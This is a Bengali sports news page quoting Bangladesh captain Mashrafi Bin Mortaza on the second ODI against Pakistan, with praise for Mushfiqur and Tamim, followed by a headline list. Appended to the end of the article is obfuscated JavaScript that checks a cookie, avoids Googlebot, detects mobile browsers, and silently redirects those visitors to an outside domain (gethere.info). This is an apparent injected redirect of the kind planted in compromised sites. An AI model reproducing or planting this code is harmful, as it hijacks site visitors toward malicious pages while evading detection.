for Add

‘দ্বিতীয় ম্যাচটিও জেতার জন্য নামবো’

mashrafi
নিজস্ব প্রতিবেদক :  তিন ম্যাচের ওয়ান ডে সিরিজের প্রথমটি জিতে বাংলাদেশ ১-০তে এগিয়ে। আরেকটি ম্যাচ জিতলেই সিরিজ বাংলাদেশের। এমন সুযোগের সামনে দাড়িয়ে মাশরাফির নেতৃত্বে আগামীকাল (রবিববার) দ্বিতীয় একদিনের ম্যাচে মাঠে নামছে বাংলাদেশ। নিষিদ্ধ থাকায় প্রথম ম্যাচটি খেলা হয়নি তার। সাকিবের নেতৃত্বে পাকিস্তানের বিপক্ষে দুর্দান্ত জয়টি উপভোগ করেছেন মাঠের বাইরে বসে। ষোল বছর পর পাকিস্তানবধের ওই ম্যাচে খেলতে না পারলেও মাশরাফির উচ্ছ্বাস কোন অংশে কম ছিলো না,‘ষোল বছর পর আমরা পাকিস্তানকে হারিয়েছি। এটা অত্যন্ত আনন্দের। ’
জয়ের এই ধারাবাহিকতা দ্বিতীয় ম্যাচেও বজায় রাখতে চান মাশরাফি। তবে এর জন্য দরকার আত্মবিশ্বাস। যেটি প্রথম ম্যাচের শুরু থেকেই ছিলো ক্রিকেটারদের সবার মাঝে। মাশরাফি বলেছেন,‘ আমি অধিনায়ক হওয়ার পর সবার কাছে একটা জিনিস চেয়েছি, যে কোন পরিস্থিতিতে দলের শারিরিক ভাষাটা যাতে ইতিবাচক থাকে। প্রথম ম্যাচে আমরা শুরুতেই ভালো খেলেছি বলেই পুরো ম্যাচে আমাদের শারীরিক ভাষাটা ও ছিলো ইতিবাচক।’
মাশরাফির বিশ্বাস বাংলাদেশ প্রথম ম্যাচে যে নৈপুন্য দেখিয়েছে তা বজায় থাকলে জয় নিশ্চিত বাংলাদেশের। তবে এর জন্য থাকা চাই আত্মবিশ্বাস। যদিও পাকিস্তান দলকে তিনি কোন ভাবেই খাটো করে দেখছেন না ‘আমার কাছে পাকিস্তান দলকে সাধারন মানের মনে হয়নি। ওদের যে বোলিং লাইন দেখেছি, বিশ্বকাপের চেয়েও বেশি ভালো ছিলো। এটা ঠিক, ওদের দলে মিসবাহ বা আহমেদ শেহজাদ নেই। ছিলেন না শহিদ আফ্রিদীও। আমাদের বিপক্ষে আফ্রিদী অনেকবার গেম চেজ চেঞ্জ করে দিয়েছেন। আমার মনে হয়, একটা দল যখন চেঞ্জ হয় তখন সিনিয়রদের অবসর নিতেই হয়। মিসবাহ বা আফ্রিদী এক সময়তো অবসর নিতেনই। তাদের স্থলে কয়েকজন নতুন খেলোয়াড় অন্তভূক্ত হয়েছেন। নতুন দল গুছিয়ে উঠতে তাই কিছু সময়তো লাগবেই। সেটা আমাদের দলেও আছে। তবে মনে হয় না ওরা শক্তির দিক থেকে কোন অংশে কম।’
সিরিজ জেতার আগেই মাশরাফি হোয়াইট ওয়াশের কথা ভাবছেন না। তিনি ধাপে ধাপে এগিয়ে যাওয়ায় বিশ্বাসী‘ আসলে প্রথম ম্যাচ জেতার পর আমরা হোয়াইট ওয়াশ করার কথা বলি। কিন্তু এতে অতিরিক্ত চাপ চলে আসে। আমি সেই চাপটি নিতে চাই না। তবে আমরা সিরিজ খেলতে নামলে প্রতিটি ম্যাচই জেতার চিন্তা করি। আমাদের কাছে এই মুহর্তে সবচেয়ে বেশি গুরুত্বপূর্ন হচ্ছে পরের ম্যাচটিতে জেতা। এটা জিতলেই আমরা সিরিজ জিতে যাব। তাই পরের ম্যাচেও আমরা জয়ের জন্য মাঠে নামবো। আমাদের সামনে দারুন একটি সুযোগ এসেছে। প্রথম ম্যাচের জয় আমাদের সেই সুযোগ করে দিয়েছে। ম্যাচটি পারফেক্ট ছিলো। কোথাও কোন ত্রুটি ছিল না। যদিও বোলিংটা আরেকটু ভালো হতে পারত। তারপরও মনে হচ্ছে ম্যাচটিতে আমরা পারফেক্ট খেলেছি। আগামীকালকের (রবিবারের) ম্যাচেও যদি আমরা ভুল কম করে খেলতে পারি তবে জেতার সুযোগ থাকবে।’
বাংলাদেশ অধিনায়ক মুশফিকের ব্যাটিংয়ের ভুয়শী প্রশংসা করেছেন,‘ মুশফিকতো বাংলাদেশের রান মেশিন। শেষ দুই-তিন বছর সে অসাধারন খেলেছে। বিশ্বের সেরা ব্যাটসম্যানরা এভাবে খেলেন। তবে তেমন আলোচিত হয় না। এটা ওর জন্য ভালো। আশা করি টিমের জন্য সে সব সময় এভাবেই খেলে যাবে। মুশফিক নিজের ফর্মের ব্যাপারে খুবই সচেতন। যখন কারো অনুশীলন থাকে না তখন ও ১০-১২ জন নেট বোলার এনে একা অনুশীলন করে। এটা তার ভালো খেলার তীব্র ইচ্ছা শক্তিই তাকে ওখানে নিয়ে গেছে।’
তামিমের কথা উঠতে মাশরাফি বলেন,‘ ওর রান করাটা সময়ের ব্যাপার ছিল। সে যে ভাবে অনুশীলন করছিল, তা দেখে আমার মনে হয়েছে তামিম শিগগিরই ভাল করবে। আপনারা ওর জন্য দোয়া করবেন।’
দলের ব্যাটিং অর্ডার নিয়ে মাশরাফির সোজাসাফটা কথা,‘ আসলে ব্যাটিং অর্ডারের বিষয়টা একটা সংখ্যামাত্র। নাম্বার-টাম্বার কোন বিষয় না। বিশ্বকাপে কোচ আমাদের তাই বলেছেন। আমরাও তাই বিশ্বাস করি। দলের চাহিদা অনুযায়ী খেলতে হবে। মানসিকভাবে সবাইকে সেভাবেই প্রস্তুত থাকতে বলা হয়েছে। সবাই এই চ্যালেঞ্জ নিতে পারি।’var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

৪০০তম গ্র্যান্ড স্ল্যাম ম্যাচ জিতে রেকর্ড জোকোভিচের নড়াইলে তারুণ্যের উৎসব চুকবল কর্মসূচি চট্টগ্রামকে হারিয়ে চ্যাম্পিয়ন রাজশাহী হকির সাবেক অধিনায়কের এ কি কান্ড! বিব্রতকর হার নিয়ে রেসলিং ক্যারিয়ারের ইতি টানলেন জন সিনা বিজয় দিবসে বিসিবির প্রীতি ম্যাচে খেলবেন যারা বিএনপির মনোনয়ন পেলেন সাবেক দুই তারকা ফুটবলার ৩০ নভেম্বর কক্সবাজারে বিওএ’র নির্বাচন বর্ণাঢ্য আয়োজনে বিএসপিএর নতুন কার্যালয় উদ্বোধন এশিয়ান আর্চারিতে ভালো করার প্রত্যয় মেসির গোলেও শেষ রক্ষা হলো মিয়ামির ইসলামিক সলিডারিটি গেমসে টিটির লক্ষ্য সেমিফাইনাল ২১তম জাতীয় দূরপাল্লা সাঁতার প্রতিযোগিতা বাংলাদেশের টেস্ট অধিনায়ক থাকছেন শান্ত ইসলামিক সলিডারিটি গেমসে কাঙ্ক্ষিত ফলাফলের প্রত্যাশা বাংলাদেশের নোশিনের শিরোপা অক্ষুন্ন হাসপাতালে ভর্তি মাহমুদউল্লাহ যোগ দিয়েছেন জামাল-জায়ানসহ ১৪ জন, ভারত ম্যাচের ক্যাম্প শুরু নারী হকিতে কোটি টাকার টুর্নামেন্ট থাইল্যান্ডের কাছে হেরে গেল বাংলাদেশের মেয়েরা কাভাকাপ ভলিবলে বাংলাদেশের টানা তৃতীয় জয় আর্টিসান জাতীয় সেপাক টাকরো শুরু কাভাকাপ ভলিবলে বাংলাদেশের দ্বিতীয় জয় সেরা সাঁতারু সামিউল রাফি চট্টগ্রামে কাল জিয়া ফুটবল টুর্নামেন্ট শীর্ষ দাবাড়ুরা খেলবেন ব্লাইন্ডফোল্ড চেস টুর্নামেন্ট আন্তর্জাতিক ভলিবলে মালদ্বীপকে হারিয়ে শুরু বাংলাদেশের জাতীয় সাঁতারে সামিউল রাফির আরেকটি রেকর্ড নরসিংদীতে সব শিক্ষাপ্রতিষ্ঠানের মাঠ খেলার উপযোগী করার নির্দেশ এশিয়ান যুব গেমস কাবাডিতে বাংলাদেশের পদক জয় কাভা আন্তর্জাতিক ভলিবল কাল থেকে শুরু রাফির ৪টি রেকর্ডসহ মোট ৭টি জাতীয় রেকর্ড ২৪ অক্টোবর শুরু হচ্ছে জাতীয় সেপাক টাকরো  জাতীয় সাঁতারে প্রথম দিনে ৫টি নতুন জাতীয় রেকর্ড কিউট-বিএসপিএ স্পোর্টস কার্নিভালে সেরা ক্রীড়াবিদ মুকুল জয় দিয়ে ওয়েস্ট ইন্ডিজ সিরিজ শুরু করতে চায় বাংলাদেশ নভেম্বরে ঢাকায় নারী বিশ্বকাপ কাবাডি আগামী এক বছরে ২৪টি ওয়ানডে খেলবে বাংলাদেশ ব্রাজিলের হয়ে বিশ্বকাপে ইতিহাস গড়তে প্রস্তুত আনচেলত্তি নারী হকিতে ভরসার নাম অর্পিতা পাল বাংলাদেশের মেয়েদের দুবাইয়ে দ্বিতীয় ম্যাচেও সহজ জয় ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র টেনিসে বাংলাদেশের জারিফ চ্যাম্পিয়ন শেষ মুহূর্তের গোলে বাংলাদেশের স্বপ্নভঙ্গ হার দিয়ে ওয়ানডে সিরিজ শুরু বাংলাদেশের হংকংয়ের বিপক্ষে পূর্ণ তিন পয়েন্টের লক্ষ্য ক্যাবরেরার ওয়ার্ল্ড টেনিস ট্যুর জুনিয়র শনিবার থেকে শুরু ৪ বছর পর শুরু হচ্ছে ফেডারেশন কাপ ‘ইনশাআল্লাহ আমরা জিতমু’ : হামজা চৌধুরী লড়াই করে হারল বাংলাদেশ আবারও বিসিবি সভাপতি বুলবুল

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add